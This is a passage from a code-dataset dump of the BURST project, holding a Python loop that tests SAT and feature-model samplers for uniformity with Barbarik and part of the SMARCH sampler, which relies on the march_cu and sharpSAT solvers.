(AppMC3);\\n\" +\n str(SAMPLER_QUICKSAMPLER) + \" for QuickSampler;\\n\" + str(\n SAMPLER_STS) + \" for STS;\\n\" + str(SAMPLER_CMS) + \" for CMS;\\n\" +\n str(SAMPLER_SPUR) + \" for SPUR;\\n\" + str(\n SAMPLER_SMARCH) + \" for SMARCH;\\n\" + str(SAMPLER_UNIGEN2) + \" for UniGen2;\\n\" +\n str(SAMPLER_KUS) + \" for KUS;\\n\" + str(\n SAMPLER_DISTAWARE) + \" for Distance-based Sampling;\\n\", default=SAMPLER_STS, dest='ref_sampler')\n parser.add_argument('--reverse', type=int, default=0, help=\"order to search in\", dest='searchOrder')\n parser.add_argument('--minSamples', type=int, default=0, help=\"min samples\", dest='minSamples')\n parser.add_argument('--maxSamples', type=int, default=sys.maxsize, help=\"max samples\", dest='maxSamples')\n parser.add_argument('--seed', type=int, required=True, dest='seed')\n parser.add_argument('--verb', type=int, dest='verbose')\n parser.add_argument('--exp', type=int, help=\"number of experiments\", dest='exp', default=1)\n parser.add_argument(\"input\", help=\"input file\")\n\n args = parser.parse_args()\n inputFile = args.input\n\n eta = args.eta\n epsilon = args.epsilon\n if (eta < 2 * epsilon):\n print(\"Eta needs to be at least two times epsilon\")\n exit(1)\n delta = args.delta\n numExperiments = args.exp\n if numExperiments == -1:\n numExperiments = sys.maxsize\n searchOrder = args.searchOrder\n verbose = args.verbose\n\n seed = args.seed\n random.seed(seed)\n minSamples = args.minSamples\n maxSamples = args.maxSamples\n\n # setting the current reference sampler\n CURR_REF_SAMPLER = args.sampler\n\n # preparing features list for distribution-aware sampling\n if args.sampler == SAMPLER_DISTAWARE:\n create_features_dict(inputFile)\n\n totalLoops = int(math.ceil(math.log(2.0 / (eta + 2 * epsilon), 2)) + 1)\n listforTraversal = range(totalLoops, 0, -1)\n if searchOrder == 1:\n listforTraversal = range(1, totalLoops + 1, 1)\n\n exp = Experiment(\n minSamples=minSamples, maxSamples=maxSamples, inputFile=inputFile,\n samplerType=args.sampler, refSamplerType=args.ref_sampler)\n\n for experiment in range(numExperiments):\n print(\"Experiment: {:<5} of {:>5}\".format(experiment, numExperiments))\n breakExperiment = False\n exp.totalSolutionsGenerated = 0\n exp.totalUniformSamples = 0\n exp.thresholdSolutions = 0\n for j in listforTraversal:\n tj = math.ceil(\n math.pow(2, j) * (2 * epsilon + eta) / ((eta - 2 * epsilon) ** 2) * math.log(4.0 / (eta + 2 * epsilon),\n 2) * (\n 4 * math.e / (math.e - 1) * math.log(1.0 / delta)))\n beta = (math.pow(2, j - 1) + 1) * (eta + 2 * epsilon) * 1.0 / (\n 4 + (2 * epsilon + eta) * (math.pow(2, j - 1) - 1))\n gamma = (beta - 2 * epsilon) / 4\n constantFactor = math.ceil(1 / (8.79 * gamma * gamma))\n boundFactor = math.log((16) * (math.e / (math.e - 1)) * (1 / (delta * (eta - 2 * epsilon) ** 2)) * math.log(\n 4 / (eta + 2 * epsilon), 2) * math.log(1 / delta), 2)\n print(\"constantFactor:{:<4} boundFactor: {:<20} logBoundFactor: {:<20}\".format(\n constantFactor, boundFactor, math.log(boundFactor, 2)))\n print(\"tj: {:<6} totalLoops: {:<5} beta: {:<10} epsilon: {:<10}\".format(\n tj, totalLoops, beta, epsilon))\n\n exp.numSolutions = int(math.ceil(constantFactor * boundFactor))\n exp.loThresh = int((exp.numSolutions * 1.0 / 2) * (1 - (beta + 2 * epsilon) / 2))\n exp.hiThresh = int((exp.numSolutions * 1.0 / 2) * (1 + (beta + 2 * epsilon) / 2))\n print(\"numSolutions: {:<5} loThresh:{:<6} hiThresh: {:<6}\".format(\n exp.numSolutions, exp.loThresh, exp.hiThresh))\n\n i = 0\n breakExperiment = False\n while i < int(tj) and not breakExperiment:\n if args.verbose:\n print(\"*** Progress *** \" + \"i: \" + str(i) + \" j: \" + str(j) + \" ---- \" + str(j * i) + \" / \" + str(\n len(listforTraversal) * tj))\n i += 1\n ok, breakExperiment = exp.one_experiment(experiment, j, i, numExperiments, tj)\n\n if ok is None:\n continue\n\n if not ok:\n i -= 1\n continue\n\n if breakExperiment:\n break\n\n if breakExperiment:\n break\n\n if not breakExperiment:\n print(\"exp:{2} Accept:1 TotalSolutionsGenerated:{0} TotalUniformSamples:{1}\".format(\n exp.totalSolutionsGenerated,\n exp.totalUniformSamples, experiment))\n\n breakExperiment = False\n" }, { "alpha_fraction": 0.635502815246582, "alphanum_fraction": 0.6448719501495361, "avg_line_length": 48.653465270996094, "blob_id": "193b2d033c9236aee28180f17a82e1053da28037", "content_id": "c9530f5bddb561a04bd97e8966bb795048296b1f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10033, "license_type": "permissive", "max_line_length": 405, "num_lines": 202, "path": "/barbarikloop.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom subprocess import check_output, TimeoutExpired, Popen, PIPE \nimport resource\nimport time\nimport csv\nimport signal\nimport argparse\nimport sys\nfrom os import listdir, chdir\nfrom os.path import isfile, join\nimport uuid\n\nSAMPLER_UNIGEN = 1\nSAMPLER_QUICKSAMPLER = 2\nSAMPLER_STS = 3\nSAMPLER_CMS = 4\nSAMPLER_UNIGEN3 = 5\nSAMPLER_SPUR = 6\nSAMPLER_SMARCH = 7\nSAMPLER_UNIGEN2 = 8\nSAMPLER_KUS = 9\nSAMPLER_DISTAWARE = 10\n\n\n\n\n# FM_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/FeatureModels/\"\n# keep it for Gilles' debugging\nFM_GILLES_FOLDER =\"/home/gilles/GillesTestModels/\"\n# FM2_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/FMEasy/\"\n# FLA_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/\"\n# FLABLASTED_DATASET_FOLDER=\"/home//gilles/samplingforfm/Benchmarks/Blasted_Real/\"\n# FLAV7_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/V7/\"\n# BENCH_ROOT_FOLDER=\"/home/gilles/samplingforfm/\" # deprecated/unused\n# ALL_BENCH_DATASET_FOLDER = \"/home/gilles/samplingforfm/Benchmarks/\" # deprecated/unused\n# FLAV3_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/V3/\"\n# FLAV15_DATASET_FOLDER=\"/home/gilles/samplingforfm/Benchmarks/V15/\"\n# FMLINUX_DATASET_FOLDER=\"/home/gilles/fm_history_linux_dimacs/\"\n\nFM_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/FeatureModels/\"\nFM2_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/FMEasy/\"\nFLA_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/\"\nFLABLASTED_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/Blasted_Real/\"\nFLAV7_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V7/\"\nFLAV3_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V3/\"\nFLAV15_DATASET_FOLDER=\"/home/samplingfm/Benchmarks/V15/\"\nFMLINUX_DATASET_FOLDER=\"/home/fm_history_linux_dimacs/\"\n\n\ndataset_fla = { 'fla' : FLA_DATASET_FOLDER, 'fm' : FM_DATASET_FOLDER, 'fmeasy' : FM2_DATASET_FOLDER, 'V15' : FLAV15_DATASET_FOLDER, 'blasted_real' : FLABLASTED_DATASET_FOLDER, 'gilles': FM_GILLES_FOLDER }\n\n\n# field names \nfields = ['file', 'time','cmd_output','err_output','Uniform','Timeout'] \n \ndef all_cnf_files(folder):\n return [join(folder, f) for f in listdir(folder) if isfile(join(folder, f)) and f.endswith(\".cnf\")]\n\ndef all_dimacs_files(folder):\n return [join(folder, f) for f in listdir(folder) if isfile(join(folder, f)) and f.endswith(\".dimacs\")]\n\n\ndef get_sampler_string(samplerType):\n if samplerType == SAMPLER_UNIGEN:\n return 'UniGen'\n if samplerType == SAMPLER_UNIGEN3:\n return 'UniGen3'\n if samplerType == SAMPLER_QUICKSAMPLER:\n return 'QuickSampler'\n if samplerType == SAMPLER_STS:\n return 'STS'\n if samplerType == SAMPLER_CMS:\n return 'CustomSampler'\n if samplerType == SAMPLER_SPUR:\n return 'SPUR'\n if samplerType == SAMPLER_SMARCH:\n return 'SMARCH'\n if samplerType == SAMPLER_UNIGEN2:\n return 'UNIGEN2'\n if samplerType == SAMPLER_KUS:\n return 'KUS'\n if samplerType == SAMPLER_DISTAWARE:\n return 'DistanceBasedSampling'\n print(\"ERROR: unknown sampler type\")\n exit(-1)\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--eta', type=float, help=\"default = 0.9\", default=0.9, dest='eta')\n parser.add_argument('--epsilon', type=float, help=\"default = 0.3\", default=0.3, dest='epsilon')\n parser.add_argument('--delta', type=float, help=\"default = 0.05\", default=0.05, dest='delta')\n parser.add_argument('--sampler', type=int, help=str(SAMPLER_UNIGEN)+\" for UniGen;\\n\" + str(SAMPLER_UNIGEN3)+\" for UniGen3 (AppMC3);\\n\" +\n str(SAMPLER_QUICKSAMPLER)+\" for QuickSampler;\\n\"+str(SAMPLER_STS)+\" for STS;\\n\" + str(SAMPLER_CMS)+\" for CMS;\\n\" +\n str(SAMPLER_SPUR)+\" for SPUR;\\n\" + str(SAMPLER_SMARCH)+\" for SMARCH;\\n\" + str(SAMPLER_UNIGEN2)+\" for UniGen2;\\n\" +\n str(SAMPLER_KUS)+\" for KUS;\\n\" + str(SAMPLER_DISTAWARE)+\" for Distance-based Sampling;\\n\", default=SAMPLER_STS, dest='sampler')\n parser.add_argument('--ref-sampler', type=int, help=str(SAMPLER_UNIGEN)+\" for UniGen;\\n\" + str(SAMPLER_UNIGEN3)+\" for UniGen3 (AppMC3);\\n\" +\n str(SAMPLER_QUICKSAMPLER)+\" for QuickSampler;\\n\"+str(SAMPLER_STS)+\" for STS;\\n\" + str(SAMPLER_CMS)+\" for CMS;\\n\" +\n str(SAMPLER_SPUR)+\" for SPUR;\\n\" + str(SAMPLER_SMARCH)+\" for SMARCH;\\n\" + str(SAMPLER_UNIGEN2)+\" for UniGen2;\\n\" +\n str(SAMPLER_KUS)+\" for KUS;\\n\" + str(SAMPLER_DISTAWARE)+\" for Distance-based Sampling;\\n\", default=SAMPLER_STS, dest='ref_sampler')\n parser.add_argument('--reverse', type=int, default=0, help=\"order to search in\", dest='searchOrder')\n parser.add_argument('--minSamples', type=int, default=0, help=\"min samples\", dest='minSamples')\n parser.add_argument('--maxSamples', type=int, default=sys.maxsize, help=\"max samples\", dest='maxSamples')\n parser.add_argument('--seed', type=int, required=True, dest='seed')\n parser.add_argument('--verb', type=int,help=\"verbose, 0 or 1, delfault=1\", default=1, dest='verbose')\n parser.add_argument('--exp', type=int, help=\"number of experiments\", dest='exp', default=1)\n parser.add_argument('--timeout',type=int, help=\"timeout in seconds\", dest='thres', default=600)\n parser.add_argument('-flas','--formulas', nargs=\"+\", help='formulas or feature models to process (cnf or dimacs files typically). You can also specify \"FeatureModels\", \"FMEasy\", \"Blasted_Real\", \"V7\", \"V3\", \"V15\", \"Benchmarks\", or \"fm_history_linux_dimacs\" to target specific folders', default=None)\n\nargs = parser.parse_args()\n\n\noutput_directory = \"output/\" + str(uuid.uuid4().hex) \nif not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\n# name of csv file \nfilename = os.path.join(output_directory, 'Uniform-' + get_sampler_string(args.sampler) + '.csv')\n\ninfo_experiment_file = os.path.join(output_directory, 'README.md')\nwith open(info_experiment_file, 'w') as expfile:\n expfile.write(str(args))\n\n\n\nflas_args = args.formulas\n\nflas_to_process = []\nprint(\"pre-processing models to analyse for uniformity\")\nif flas_args is not None:\n print(\"formulas to process explicitly given\", flas_args)\n for fla_arg in flas_args:\n if fla_arg == \"fm_history_linux_dimacs\":\n print(\"folder of Linux formulas (SPLC challenge track)\", fla_arg)\n print(\"WARNING: requires the big dataset, use the appropriate Docker image eg macher/usampling:fmlinux\") \n flas_to_process.extend(all_dimacs_files(FMLINUX_DATASET_FOLDER))\n elif fla_arg in 'gilles': #debug\n print(\"selection of FMs selected by Gilles, for debug\")\n flas_to_process.extend(all_cnf_files(FM_GILLES_FOLDER)) \n elif fla_arg in \"Benchmarks\": # debug or deprecated? \n print(\"folder of formulas\", fla_arg)\n # flas_to_process.extend(all_cnf_files(BENCH_ROOT_FOLDER + fla_arg))\n flas_to_process.extend(all_cnf_files(\"/home/samplingfm/\" + fla_arg)) \n elif fla_arg in (\"FeatureModels\", \"FMEasy\", \"Blasted_Real\", \"V7\", \"V3\", \"V15\"):\n print(\"folder of formulas\", fla_arg)\n flas_to_process.extend(all_cnf_files(FLA_DATASET_FOLDER + fla_arg))\n else:\n print('individual formula', fla_arg)\n flas_to_process.append(fla_arg)\nelse: # by default \n print(\"default dataset/folders\", dataset_fla)\n for dataset_key, dataset_folder in dataset_fla.items():\n flas_to_process.extend(all_cnf_files(dataset_folder))\n\nprint(len(flas_to_process), \"formulas to process\", flas_to_process)\n\n \n# writing to csv file \nwith open(filename, 'w') as csvfile:\n #status = 0 \n # creating a csv dict writer object \n writer = csv.DictWriter(csvfile, fieldnames = fields)\n # writing headers (field names) \n writer.writeheader() \n\n for b in flas_to_process:\n try:\n print(\"Processing \" + b)\n start = time.time()\n c = ''\n err = ''\n sampler_cmd = [\"python3\",\"barbarik.py\",\"--seed\",str(args.seed),\"--verb\",str(args.verbose),\"--eta\",str(args.eta),\"--epsilon\",str(args.epsilon),\"--delta\",str(args.delta),\"--reverse\",str(args.searchOrder),\"--exp\",str(args.exp),\"--minSamples\",str(args.minSamples),\"--maxSamples\",str(args.maxSamples),\"--sampler\",str(args.sampler),\"--ref-sampler\",str(args.ref_sampler),\"--verb\",str(args.verbose),b]\n print(\"cmd: \"+ str(sampler_cmd)) \n proc= Popen(sampler_cmd, stdout=PIPE, stderr=PIPE,preexec_fn=os.setsid)\n c,err= proc.communicate(timeout=args.thres)\n #c=check_output(sampler_cmd,timeout=10,preexec_fn=os.setsid)\n if c: \n print(\"barbarik output: \" + format(c))\n uniform = None\n if \"isUniform: 0\" in format(c):\n uniform = False\n print(\"NOT UNIFORM\")\n elif \"isUniform: 1\" in format(c):\n uniform = True\n print(\"UNIFORM\")\n else:\n uniform = \"N/A\"\n writer.writerow({'file': b, 'time': \"{:.3f}\".format(time.time() - start),'cmd_output': format(c),'err_output': format(err), 'Uniform': uniform,'Timeout':'FALSE'})\n else: \n writer.writerow({'file': b, 'time': \"{:.3f}\".format(time.time() - start),'cmd_output': \"NULL\",'err_output': format(err),'Uniform':\"N/A\",'Timeout':'FALSE'})\n csvfile.flush()\n except TimeoutExpired:\n print('TIMEOUT')\n writer.writerow({'file': b, 'time': \"{:.3f}\".format(time.time() - start),'cmd_output': format(c),'err_output': format(err),'Uniform':\"N/A\",'Timeout':'TRUE'})\n csvfile.flush()\n os.killpg(os.getpgid(proc.pid),signal.SIGTERM) \n except:\n writer.writerow({'file': b, 'time': \"{:.3f}\".format(time.time() - start),'cmd_output': format(c),'err_output': format(err),'Uniform':\"N/A\",'Timeout':'FALSE'})\n csvfile.flush()\n os.killpg(os.getpgid(proc.pid),signal.SIGTERM) \n" }, { "alpha_fraction": 0.47814303636550903, "alphanum_fraction": 0.4843878746032715, "avg_line_length": 30.147727966308594, "blob_id": "281da97eb9830e31a6d38e5d7b7a2407568d9c9a", "content_id": "1600a5a5096c10d0052b8242f813089fc3c64edb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16974, "license_type": "permissive", "max_line_length": 153, "num_lines": 528, "path": "/samplers/smarch.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "\"\"\"\r\nSmarch - random sampling of propositional formula solutions\r\nVersion - 0.1\r\n\"\"\"\r\n\r\n\r\nimport random\r\nfrom subprocess import getoutput\r\nimport pycosat\r\nimport os\r\nimport time\r\nimport sys\r\nimport getopt\r\nimport shutil\r\n\r\nfrom anytree import AnyNode\r\nfrom anytree.exporter import JsonExporter\r\nfrom anytree.importer import JsonImporter\r\n\r\nsrcdir = os.path.dirname(os.path.abspath(__file__))\r\nSHARPSAT = srcdir + '/sharpSATSMARCH/Release/sharpSAT'\r\nMARCH = srcdir + '/march_cu/march_cu'\r\n\r\n\r\n\r\ndef read_dimacs(dimacsfile_):\r\n \"\"\"parse variables and clauses from a dimacs file\"\"\"\r\n\r\n _features = list()\r\n _clauses = list()\r\n _vcount = '-1' # required for variables without names\r\n\r\n with open(dimacsfile_) as f:\r\n for line in f:\r\n # read variables in comments\r\n if line.startswith(\"c ind\"): #we do not deal with independant variables produced by other tool - modification w.r.t original SMARCH MP \r\n continue \r\n elif line.startswith(\"c\"):\r\n line = line[0:len(line) - 1]\r\n _feature = line.split(\" \", 4)\r\n del _feature[0]\r\n # handling non-numeric feature IDs - modification w.r.t original SMARCH MP, necessary to parse os-like models with $ in feature names...\r\n if len(_feature) <= 2 and len(_feature) > 0: # needs to deal with literate comments, e.g., in V15 models\r\n \r\n if (_feature[0].isdigit()):\r\n _feature[0] = int(_feature[0])\r\n else:\r\n # num_filter = filter(_feature[0].isdigit(), _feature[0])\r\n num_feature = \"\".join(c for c in _feature[0] if c.isdigit())\r\n _feature[0] = int(num_feature)\r\n _features.append(tuple(_feature))\r\n # read dimacs properties\r\n elif line.startswith(\"p\"):\r\n info = line.split()\r\n _vcount = info[2]\r\n # read clauses\r\n else:\r\n info = line.split()\r\n if len(info) != 0:\r\n _clauses.append(list(map(int, info[:len(info)-1])))\r\n return _features, _clauses, _vcount\r\n\r\n\r\ndef read_constraints(constfile_, features_):\r\n \"\"\"read constraint file. - means negation\"\"\"\r\n\r\n _const = list()\r\n\r\n if os.path.exists(constfile_):\r\n names = [i[1] for i in features_]\r\n with open(constfile_) as file:\r\n for line in file:\r\n line = line.rstrip()\r\n data = line.split()\r\n if len(data) != 0:\r\n clause = list()\r\n\r\n error = False\r\n for name in data:\r\n prefix = 1\r\n if name.startswith('-'):\r\n name = name[1:len(name)]\r\n prefix = -1\r\n\r\n if name in names:\r\n i = names.index(name)\r\n clause.append(features_[i][0] * prefix)\r\n else:\r\n error = True\r\n clause.append(name)\r\n\r\n if not error:\r\n _const.append(clause)\r\n print(\"Added constraint: \" + line + \" \" + str(clause))\r\n else:\r\n print(\"Feature not found\" + str(clause))\r\n\r\n # line = line[0:len(line) - 1]\r\n # prefix = ''\r\n # if line.startswith('!'):\r\n # line = line[1:len(line)]\r\n # prefix = '-'\r\n #\r\n # # filter features that does not exist\r\n # if line in names:\r\n # i = names.index(line)\r\n # _const.append(prefix + features_[i][0])\r\n # print(\"Added constraint: \" + prefix + features_[i][0] + \",\" + prefix + features_[i][1])\r\n else:\r\n print(\"Constraint file not found\")\r\n\r\n return _const\r\n\r\n\r\ndef get_var(flist, features_):\r\n \"\"\"convert feature names into variables\"\"\"\r\n\r\n _const = list()\r\n names = [i[1] for i in features_]\r\n\r\n for feature in flist:\r\n #feature = feature[0:len(feature) - 1]\r\n prefix = 1\r\n if feature.startswith('-'):\r\n feature = feature[1:len(feature)]\r\n prefix = -1\r\n\r\n # filter features that does not exist\r\n if feature in names:\r\n i = names.index(feature)\r\n _const.append(prefix * features_[i][0])\r\n\r\n return _const\r\n\r\n\r\ndef gen_dimacs(vars_, clauses_, constraints_, outfile_):\r\n \"\"\"generate a dimacs file from given clauses and constraints\"\"\"\r\n\r\n f = open(outfile_, 'w')\r\n f.write('p cnf ' + vars_ + ' ' + str(len(clauses_) + len(constraints_)) + '\\n')\r\n\r\n for cl in clauses_:\r\n #f.write(cl + '\\n')\r\n f.write(\" \".join(str(x) for x in cl) + ' 0 \\n')\r\n\r\n for ct in constraints_:\r\n if isinstance(ct, (list,)):\r\n line = \"\"\r\n for v in ct:\r\n line = line + str(v) + \" \"\r\n f.write(line + '0 \\n')\r\n else:\r\n f.write(str(ct) + ' 0 \\n')\r\n\r\n f.close()\r\n\r\n\r\ndef count(dimacs_, constraints_):\r\n \"\"\"count dimacs solutions with given constraints\"\"\"\r\n\r\n _tempdimacs = os.path.dirname(dimacs_) + '/count.dimacs'\r\n _features, _clauses, _vcount = read_dimacs(dimacs_)\r\n\r\n gen_dimacs(_vcount, _clauses, constraints_, _tempdimacs)\r\n res = int(getoutput(SHARPSAT + ' -q ' + _tempdimacs))\r\n\r\n return res\r\n\r\n\r\ndef checkSAT(dimacs_, constraints_):\r\n \"\"\"check satisfiability of given formula with constraints\"\"\"\r\n _features, _clauses, _vcount = read_dimacs(dimacs_)\r\n cnf = _clauses + constraints_\r\n s = pycosat.solve(cnf)\r\n\r\n if s == 'UNSAT':\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef sample(vcount_, clauses_, n_, wdir_, const_=(), cache_=False, quiet_=False, samplefile_=\"\"):\r\n \"\"\"sample configurations\"\"\"\r\n\r\n if not os.path.exists(wdir_):\r\n os.makedirs(wdir_)\r\n\r\n samples = list()\r\n\r\n # partition space by cubes and count number of solutions for each cube\r\n def partition(assigned_, current_, tree_):\r\n _total = 0\r\n _counts = list()\r\n _cubes = list()\r\n _freevar = list()\r\n _dimacsfile = wdir_ + '/dimacs.smarch'\r\n _cubefile = wdir_ + '/cubes.smarch'\r\n\r\n # create dimacs file regarding constraints\r\n gen_dimacs(vcount_, clauses_, assigned_, _dimacsfile)\r\n\r\n # execute march to get cubes\r\n res = getoutput(MARCH + ' ' + _dimacsfile + ' -d 5 -# -o ' + _cubefile)\r\n out = res.split(\"\\n\")\r\n\r\n # print march result (debugging purpose)\r\n #print(out)\r\n\r\n if out[7].startswith('c all'):\r\n _freevar = out[5].split(\": \")[1].split()\r\n\r\n with open(_cubefile) as f:\r\n for _line in f:\r\n _cube = list(_line.split())\r\n if 'a' in _cube:\r\n _cube.remove('a')\r\n if '0' in _cube:\r\n _cube.remove('0')\r\n\r\n _cubes.append(_cube)\r\n\r\n # execute sharpSAT to count solutions\r\n for _cube in _cubes:\r\n gen_dimacs(vcount_, clauses_, assigned_ + _cube, _dimacsfile)\r\n res = int(getoutput(SHARPSAT + ' -q ' + _dimacsfile))\r\n # print(res)\r\n _total += res\r\n _counts.append(res)\r\n\r\n # double check if all variables are free (nonempty freevar means all free)\r\n if _total != pow(2, len(_freevar)):\r\n _freevar.clear()\r\n\r\n # set total number of solutions\r\n current_.count = _total\r\n\r\n if tree_:\r\n # extend tree - do not extend if all variables are free\r\n if len(_freevar) == 0:\r\n for _i in range(0, len(_counts)):\r\n _node = AnyNode(parent=current_, count=_counts[_i], cube=_cubes[_i])\r\n\r\n return [_freevar, _counts, _cubes, _total]\r\n\r\n # generate n random numbers for sampling\r\n def get_random(rcount_, total_):\r\n def gen_random():\r\n while True:\r\n yield random.randrange(1, total_, 1)\r\n\r\n def gen_n_unique(source, n__):\r\n seen = set()\r\n seenadd = seen.add\r\n for i in (i for i in source() if i not in seen and not seenadd(i)):\r\n yield i\r\n if len(seen) == n__:\r\n break\r\n\r\n return [i for i in gen_n_unique(gen_random, min(rcount_, int(total_ - 1)))]\r\n\r\n # select a cube based on given random number\r\n def select_cube(counts_, cubes_, number_):\r\n _terminate = False\r\n _index = -1\r\n _i = 0\r\n\r\n for c in counts_:\r\n if number_ <= c:\r\n _index = _i\r\n if c == 1:\r\n _terminate = True\r\n break\r\n else:\r\n number_ -= c\r\n _i += 1\r\n\r\n return cubes_[_index], number_, _terminate\r\n\r\n # traverse the cube tree based on given random number (requires cache_=True)\r\n def traverse_cube(current_, number_):\r\n _assigned = list()\r\n _terminate = False\r\n #_assigned = _assigned + _current.cube\r\n\r\n while len(current_.children) != 0 or current_.count != 1:\r\n for node in current_.children:\r\n if number_ <= node.count:\r\n _assigned = _assigned + node.cube\r\n current_ = node\r\n break\r\n else:\r\n number_ -= node.count\r\n break\r\n\r\n if current_.count == 1:\r\n _terminate = True\r\n\r\n return _assigned, number_, _terminate, current_\r\n\r\n # assign free variables without recursion\r\n def set_freevar(freevar_, number_):\r\n _vars = list()\r\n\r\n for v in freevar_:\r\n if number_ % 2 == 1:\r\n _vars.append(v)\r\n else:\r\n _vars.append('-'+v)\r\n number_ //= 2\r\n\r\n return _vars\r\n\r\n clauses_ = clauses_ + const_\r\n\r\n root = AnyNode(count=-1, cube=[])\r\n if not quiet_:\r\n print(\"Counting - \", end='')\r\n freevar = partition([], root, cache_)\r\n\r\n if not quiet_:\r\n print(\"Total configurations: \" + str(freevar[3]))\r\n\r\n start_time = time.time()\r\n\r\n # generate random numbers\r\n rands = get_random(n_, freevar[3])\r\n\r\n if samplefile_ != \"\":\r\n f = open(samplefile_, \"w\")\r\n else:\r\n f = \"\"\r\n\r\n i = 0\r\n\r\n # sample for each random number\r\n for r in rands:\r\n if not quiet_:\r\n print(\"Sampling \" + str(i) + \" with \" + str(r) + \" - \", end='')\r\n sample_time = time.time()\r\n\r\n # initialize variables\r\n number = r\r\n assigned = list()\r\n current = root\r\n\r\n if len(freevar[0]) != 0: # all variables free, sampling done\r\n assigned = assigned + set_freevar(freevar[0], int(number))\r\n #print(\"all free\")\r\n terminate = True\r\n else: # select cube to recurse\r\n if cache_:\r\n cube, number, terminate, current = traverse_cube(current, number)\r\n else:\r\n cube, number, terminate = select_cube(freevar[1], freevar[2], number)\r\n assigned = assigned + cube\r\n\r\n if len(cube) == 0:\r\n print(\"ERROR: cube not selected\")\r\n exit()\r\n\r\n # recurse\r\n while not terminate:\r\n r_freevar = partition(assigned, current, cache_)\r\n\r\n if len(r_freevar[0]) != 0: # all variables free, sampling done\r\n assigned = assigned + set_freevar(r_freevar[0], int(number))\r\n #print(\"all free\")\r\n terminate = True\r\n else: # select cube to recurse\r\n if cache_:\r\n cube, number, terminate, current = traverse_cube(current, number)\r\n else:\r\n cube, number, terminate = select_cube(r_freevar[1], r_freevar[2], number)\r\n assigned = assigned + cube\r\n\r\n if len(cube) == 0:\r\n print(\"ERROR: cube not selected\")\r\n exit()\r\n\r\n # verify if sample is valid and assign dead variables using pycosat\r\n assigned = list(map(int, assigned))\r\n aclause = [assigned[i:i+1] for i in range(0, len(assigned))]\r\n cnf = clauses_ + aclause\r\n s = pycosat.solve(cnf)\r\n\r\n # print(s)\r\n\r\n # sdimacs = sdir + \"/\" + str(i) + \".dimacs\"\r\n # gen_dimacs(vcount_, clauses_, assigned, sdimacs)\r\n # getoutput(\"minisat \" + sdimacs + \" \" + sdir + \"/\" + str(i) + \".sol\")\r\n # res = int(getoutput(SHARPSAT + ' -q ' + sdimacs))\r\n # print(res)\r\n\r\n # print(len(s))\r\n\r\n if s == 'UNSAT':\r\n print(\"ERROR: Sample Invalid\")\r\n exit(1)\r\n else:\r\n if samplefile_ == \"\":\r\n samples.append(set(s))\r\n else:\r\n for v in s:\r\n f.write(str(v))\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n\r\n if not quiet_:\r\n print(\"sampling time: \" + str(time.time() - sample_time))\r\n\r\n i += 1\r\n\r\n if not quiet_:\r\n print(\"--- total time: %s seconds ---\" % (time.time() - start_time))\r\n\r\n if cache_:\r\n exporter = JsonExporter()\r\n with open(wdir_ + \"/tree.json\", 'w') as file:\r\n file.write(exporter.export(root))\r\n file.close()\r\n else:\r\n shutil.rmtree(wdir_)\r\n\r\n if samplefile_ != \"\":\r\n f.close()\r\n\r\n return samples\r\n\r\n\r\n# test script\r\n# n = 10\r\n# target = \"axtls_2_1_4\"\r\n#\r\n# dimacs = \"/home/jeho/kmax/kconfig_case_studies/cases/\" + target + \"/build/kconfig.dimacs\"\r\n# constfile = os.path.dirname(dimacs) + \"/constraints.txt\"\r\n# wdir = os.path.dirname(dimacs) + \"/smarch\"\r\n#\r\n# features, clauses, vcount = read_dimacs(dimacs)\r\n# const = read_constraints(constfile, features)\r\n#\r\n# samples = sample(vcount, clauses, n, wdir, const, True, 1)\r\n\r\n\r\n# run script\r\nif __name__ == \"__main__\":\r\n # get external location for sharpSAT and march if needed\r\n if os.path.exists(srcdir + \"/links.txt\"):\r\n with open(srcdir + \"/links.txt\") as f:\r\n for _line in f:\r\n link = list(_line.split('='))\r\n if len(link) != 0 and link[0][0] != '#':\r\n if link[0] == \"SHARPSAT\":\r\n SHARPSAT = link[1]\r\n elif link[0] == \"MARCH\":\r\n MARCH = link[1]\r\n\r\n # check sharpSAT and march_cu existence\r\n if not os.path.exists(SHARPSAT):\r\n print(\"ERROR: sharpSAT not found\")\r\n\r\n if not os.path.exists(MARCH):\r\n print(\"ERROR: March solver not found\")\r\n\r\n # get parameters from console\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], \"hc:o:q\", ['help', \"cfile=\", \"odir=\", 'quiet'])\r\n except getopt.GetoptError:\r\n print('smarch.py -c <constfile> -o <outputdir> -q| <dimacsfile> <samplecount>')\r\n sys.exit(2)\r\n\r\n if len(args) < 2:\r\n print('smarch.py -c <constfile> -o <outputdir> -q | <dimacsfile> <samplecount>')\r\n sys.exit(2)\r\n\r\n dimacs = args[0]\r\n base = os.path.basename(dimacs)\r\n target = os.path.splitext(base)[0]\r\n\r\n n = int(args[1])\r\n\r\n print('Input file: ', dimacs)\r\n print('Number of samples: ', n)\r\n\r\n wdir = os.path.dirname(dimacs) + \"/smarch\"\r\n constfile = ''\r\n samplefile = \"\"\r\n quiet = False\r\n cache = False\r\n out = False\r\n\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print('smarch.py -c <constfile> -o <outputdir> -s | <dimacsfile> <samplecount>')\r\n sys.exit()\r\n elif opt in (\"-c\", \"--cfile\"):\r\n constfile = arg\r\n print(\"Consraint file: \" + constfile)\r\n elif opt in (\"-o\", \"--odir\"):\r\n odir = arg\r\n wdir = odir + \"/smarch\"\r\n 